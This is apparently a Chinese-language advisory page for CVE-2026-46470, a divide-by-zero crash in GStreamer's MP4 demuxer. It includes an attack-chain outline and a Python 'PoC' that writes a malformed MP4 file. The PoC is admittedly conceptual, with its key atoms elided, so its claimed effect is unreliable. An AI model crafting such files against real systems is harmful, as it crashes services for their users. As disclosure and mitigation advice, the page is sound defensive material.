CVE-2026-46470 CVSS 4.0 中危

CVE-2026-46470: GStreamer除零导致拒绝服务漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-46470

漏洞类型

拒绝服务

CVSS评分

4.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GStreamer gst-plugins-good

漏洞概述

GStreamer gst-plugins-good 1.28.2之前的版本存在安全漏洞。在解析MP4音频轨道时，isomp4插件的qtdemux_audio_caps函数未对原子数据进行充分验证，直接执行除法操作。攻击者可诱导系统解析特制的MP4文件，触发整数除零错误，从而导致应用程序崩溃或拒绝服务。

技术细节

该漏洞源于GStreamer gst-plugins-good组件中isomp4插件的代码逻辑缺陷。在解析MP4音频轨道时，`qtdemux_audio_caps`函数负责提取和解码音频流的配置信息。为了计算音频采样率或相关参数，该函数会执行除法运算。然而，代码逻辑存在疏漏，未对作为除数的原子数据字段进行非零验证。攻击者可精心构造一个特制的MP4音频文件，使得解析过程中读取到的除数值为零。当受害者使用受影响版本的GStreamer处理该文件时，CPU会执行除零指令，触发硬件异常。在默认异常处理机制下，这将导致应用程序立即崩溃，造成拒绝服务。虽然CVSS评分显示为本地攻击，但在处理用户上传文件的Web服务中，也可能被利用以中断服务。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用了GStreamer gst-plugins-good 1.28.2之前的版本。

STEP 2

武器化

攻击者构造一个特制的MP4音频文件，其中包含导致除数为零的恶意原子数据。

STEP 3

投递

攻击者通过本地文件系统、邮件附件或Web上传等方式，将恶意MP4文件投递给受害者。

STEP 4

利用

受害者试图播放或解析该文件，GStreamer的isomp4插件调用qtdemux_audio_caps函数处理音频轨道。

STEP 5

影响

函数执行除零操作，触发异常，导致应用程序崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# PoC script to generate a malformed MP4 file triggering the division by zero
# This is a conceptual PoC. The exact atom structure needs to match the vulnerable code path.

def create_poc(filename):
    with open(filename, 'wb') as f:
        # Write minimal MP4 header (ftyp)
        f.write(b'\x00\x00\x00\x20\x66\x74\x79\x70')
        f.write(b'mp42' + b'\x00\x00\x00\x00')
        f.write(b'mp42' + b'\x00\x00\x00\x00')
        
        # Write a malformed 'moov' atom
        # The vulnerability is in qtdemux_audio_caps, likely within 'stsd' or similar audio description atoms.
        # We inject a zero value where a divisor is expected.
        
        moov_content = b''
        # ... (construction of specific atoms causing the issue) ...
        
        # Example malicious atom header (Size = 0x100, Type = 'mdat' or relevant audio atom)
        # The actual payload would contain the zero divisor.
        malicious_atom = struct.pack('>I', 0x100) + b'stsd' + (b'\x00' * 240)
        
        f.write(malicious_atom)

if __name__ == "__main__":
    create_poc("cve_2026_46470_poc.mp4")

影响范围

GStreamer gst-plugins-good < 1.28.2

防御指南

临时缓解措施

建议用户尽快升级至GStreamer gst-plugins-good 1.28.2或更高版本以修复此漏洞。在无法立即升级的情况下，应避免打开来源不明的MP4音频文件，或在沙箱环境中处理此类文件，以降低应用程序崩溃的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表